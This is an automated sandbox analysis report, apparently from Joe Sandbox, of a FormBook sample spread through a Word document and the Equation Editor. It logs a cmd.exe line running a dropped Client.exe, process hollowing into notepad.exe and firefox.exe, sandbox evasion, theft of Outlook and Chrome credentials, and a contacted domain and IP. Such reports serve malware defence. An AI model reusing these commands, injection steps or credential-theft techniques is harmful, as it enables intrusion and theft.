          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041E075 push eax; ret 9_2_0041E0C8
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0040880F push ebx; iretd 9_2_00408810
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041E0C2 push eax; ret 9_2_0041E0C8
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_004140CB push 00000011h; retf 9_2_004140CD
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041E0CB push eax; ret 9_2_0041E132
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041B11A push edi; retf 9_2_0041B11B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041E12C push eax; ret 9_2_0041E132
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0040D2D0 pushfd ; retf 9_2_0040D348
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00406AE4 push ebp; ret 9_2_00406AE5
          Source: Client.exe.0.drStatic PE information: section name: bdzG4e
          Source: Client.exe.0.drStatic PE information: section name:
          Source: initial sampleStatic PE information: section name: bdzG4e entropy: 7.99949678623572
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Client.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1404Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exe TID: 2252Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE TID: 2652Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B60101 rdtsc 9_2_00B60101
          Source: C:\Users\user\AppData\Local\Temp\Client.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_01188E9C sldt word ptr [eax]5_2_01188E9C
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 0000000A.00000000.1006484314.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 0000000A.00000000.1011618925.0000000008844000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 0000000A.00000000.1011618925.0000000008844000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 0000000A.00000000.968063390.000000000434F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
          Source: explorer.exe, 0000000A.00000000.1027105135.000000000037B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
          Source: explorer.exe, 0000000A.00000000.968616738.0000000004423000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.1006484314.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
          Source: explorer.exe, 0000000A.00000000.968063390.000000000434F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
          Source: EQNEDT32.EXE, 00000002.00000003.898154429.00000000005C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Vmcicda.dll
          Source: explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B60101 rdtsc 9_2_00B60101
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B00080 mov ecx, dword ptr fs:[00000030h]9_2_00B00080
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B000EA mov eax, dword ptr fs:[00000030h]9_2_00B000EA
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B226F8 mov eax, dword ptr fs:[00000030h]9_2_00B226F8
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\notepad.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00363550 LdrLoadDll,5_2_00363550
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.magadirect.co.uk
          Source: C:\Windows\explorer.exeNetwork Connect: 45.33.18.44 80Jump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\Client.exeSection unmapped: C:\Windows\SysWOW64\notepad.exe base address: 400000Jump to behavior
          Source: C:\Windows\SysWOW64\notepad.exeSection unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: A00000Jump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection unmapped: C:\Program Files (x86)\Mozilla Firefox\firefox.exe base address: 190000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\notepad.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\notepad.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\notepad.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\notepad.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 400000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 401000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 7EFDE008Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 80000Jump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\notepad.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\notepad.exeThread register set: target process: 1860Jump to behavior
          Source: C:\Windows\SysWOW64\notepad.exeThread register set: target process: 1860Jump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEThread register set: target process: 1860Jump to behavior
          Creates a thread in another existing process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\Client.exeThread created: C:\Windows\SysWOW64\notepad.exe EIP: 75554977Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A CJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A CJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{9A42BBC4-4F4B-4518-841E-56E3DAA7341B}Jump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exeJump to behavior
          Source: explorer.exe, 0000000A.00000000.984754885.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.951754136.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027690828.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000A.00000000.984754885.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.951754136.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000A.00000000.984754885.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.951754136.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027690828.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager<
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Client.exe VolumeInformationJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		1
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium4
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts43
          Exploitation for Client Execution          		Boot or Logon Initialization Scripts812
          Process Injection          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory13
          System Information Discovery          		Remote Desktop Protocol1
          Man in the Browser          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)3
          Obfuscated Files or Information          		Security Account Manager121
          Security Software Discovery          		SMB/Windows Admin Shares1
          Data from Local System          		Automated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)3
          Software Packing          		NTDS2
          Process Discovery          		Distributed Component Object Model1
          Email Collection          		Scheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets41
          Virtualization/Sandbox Evasion          		SSH1
          Clipboard Data          		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Masquerading          		Cached Domain Credentials1
          Remote System Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items41
          Virtualization/Sandbox Evasion          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job812
          Process Injection          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

